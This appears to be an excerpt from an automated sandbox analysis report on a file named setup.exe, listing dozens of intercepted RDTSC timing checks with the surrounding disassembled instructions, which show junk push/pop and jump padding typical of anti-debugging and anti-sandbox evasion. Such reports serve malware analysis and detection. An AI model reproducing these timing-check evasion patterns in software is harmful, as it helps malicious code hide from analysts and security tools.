Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0357 second address: 5F0366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0366 second address: 5F0377 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0377 second address: 5F037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0778 second address: 5F077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F077D second address: 5F0783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0783 second address: 5F0793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jl 00007F808D28052Eh 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F090F second address: 5F0913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0913 second address: 5F0926 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b ja 00007F808D280526h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0A7B second address: 5F0A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 jmp 00007F808D4B80C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0A98 second address: 5F0AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0AA0 second address: 5F0AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0AA4 second address: 5F0ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F808D280531h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e js 00007F808D280532h 0x00000014 ja 00007F808D28052Ah 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0E78 second address: 5F0EA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F808D4B80C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F808D4B80C1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FBCCB second address: 5FBCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FBE37 second address: 5FBE4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007F808D4B80B6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FBE4B second address: 5FBE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC157 second address: 5FC15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC15D second address: 5FC161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC161 second address: 5FC16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F808D4B80B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC83E second address: 5FC842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC842 second address: 5FC85C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C0h 0x00000007 jo 00007F808D4B80B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC85C second address: 5FC861 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FC861 second address: 5FC879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F808D4B80BCh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FCB7E second address: 5FCB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FD9E0 second address: 5FD9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F808D4B80B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 602852 second address: 60286B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F808D28052Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60286B second address: 60286F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60286F second address: 602895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F808D280537h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6026CA second address: 6026CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6064EC second address: 60650B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 je 00007F808D280526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F808D280526h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 606655 second address: 60665F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F808D4B80B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60665F second address: 606668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54761B second address: 54761F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 54761F second address: 547623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60A593 second address: 60A5AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C2h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60A5AB second address: 60A5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60A5B3 second address: 60A5B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 616615 second address: 616626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D28052Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 616626 second address: 61663E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F808D4B80BEh 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6191C3 second address: 6191CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 627533 second address: 627539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 627539 second address: 627543 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 627543 second address: 627552 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F808D4B80BAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 627552 second address: 627558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6308CF second address: 6308D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6308D5 second address: 6308EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F808D28052Dh 0x0000000c pop esi 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 62F30B second address: 62F311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 62F44E second address: 62F452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 62F452 second address: 62F45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 62F45E second address: 62F462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 62F893 second address: 62F8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6345D8 second address: 6345DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6345DE second address: 6345E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 634155 second address: 634159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6342EC second address: 6342F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6342F2 second address: 6342F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6342F6 second address: 6342FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6342FF second address: 634305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 64AB67 second address: 64AB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D4B80BFh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 64785F second address: 647863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 545B62 second address: 545B78 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F808D4B80B6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 545B78 second address: 545B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F808D280526h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 545B84 second address: 545B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 657579 second address: 65757E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 670290 second address: 6702A0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F808D4B80BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 670D98 second address: 670DAA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F808D280526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b js 00007F808D280526h 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 670F38 second address: 670F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F808D4B80B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 672A27 second address: 672A3D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F808D280532h 0x0000000e jc 00007F808D280526h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 675A7A second address: 675A95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 675A95 second address: 675AA8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F808D280528h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 675AA8 second address: 675ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 676EEA second address: 676EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 676EF0 second address: 676F03 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F808D4B80B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F808D4B80B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 678843 second address: 678847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 678847 second address: 67884B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 67884B second address: 678851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 678851 second address: 67885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 67885C second address: 678893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F808D280536h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F808D280537h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 678893 second address: 67889D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 67889D second address: 6788B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F808D280534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6788B5 second address: 6788BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0CD3 second address: 4AD0CD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0CD9 second address: 4AD0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0CEC second address: 4AD0CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0CF0 second address: 4AD0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D4B80C1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0D0C second address: 4AD0D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0D12 second address: 4AD0D8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F808D4B80C6h 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov eax, 4380CE4Dh 0x0000001b mov ch, 02h 0x0000001d popad 0x0000001e pop ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F808D4B80BBh 0x00000026 and cx, 3FFEh 0x0000002b jmp 00007F808D4B80C9h 0x00000030 popfd 0x00000031 pushad 0x00000032 jmp 00007F808D4B80BEh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0D1A second address: 4AC0D3C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D280537h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0D3C second address: 4AC0D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0D54 second address: 4AC0D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0D58 second address: 4AC0D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F808D4B80BDh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 mov cl, bh 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F808D4B80C5h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00719 second address: 4B0071D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B0071D second address: 4B00721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00721 second address: 4B00727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00727 second address: 4B0072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B0072D second address: 4B00761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F808D280530h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F808D28052Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00761 second address: 4B00767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00767 second address: 4B0076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B0076B second address: 4B0076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA010B second address: 4AA010F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA010F second address: 4AA0113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA0113 second address: 4AA0119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA0119 second address: 4AA0136 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 6A154446h 0x00000012 popad 0x00000013 rdtsc
